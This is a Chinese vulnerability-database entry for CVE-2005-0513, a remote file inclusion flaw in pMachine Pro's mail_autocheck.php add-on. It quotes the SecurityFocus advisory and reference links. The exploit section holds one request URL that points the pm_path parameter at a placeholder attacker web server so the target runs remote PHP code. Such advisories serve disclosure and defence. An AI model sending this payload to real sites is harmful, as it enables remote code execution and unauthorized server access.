Pmachine Pro Email This Entry Mail_autocheck.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108470 漏洞类型 输入验证
发布时间 2005-02-19 更新时间 2006-09-28
CVE编号 CVE-2005-0513 CNNVD-ID CNNVD-200502-070
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25127
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-070
|漏洞详情
pMachine是一款CMS管理系统。pMachinePro2.4以及包含pMachineFree在内的其他可能版本的EmailThisEntry插件之mail_autocheck.php中的PHP远程文件包含漏洞,这可让远程攻击者通过直接请求mail_autocheck.php并将pm_path参数修改为引用包含PHP代码的远程Web服务器上的URL来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/12597/info

PMachine Pro is reported prone to a remote file include vulnerability.

This issue affects the 'mail_autocheck.php' script.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.

The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well. 

http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?
|参考资料

来源:BID
名称:12597
链接:http://www.securityfocus.com/bid/12597
来源:BID
名称:15473
链接:http://www.securityfocus.com/bid/15473
来源:FULLDISC
名称:20050219pMachinePro/pMachineFreeRemoteCodeExecution
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=110883604531802&w=2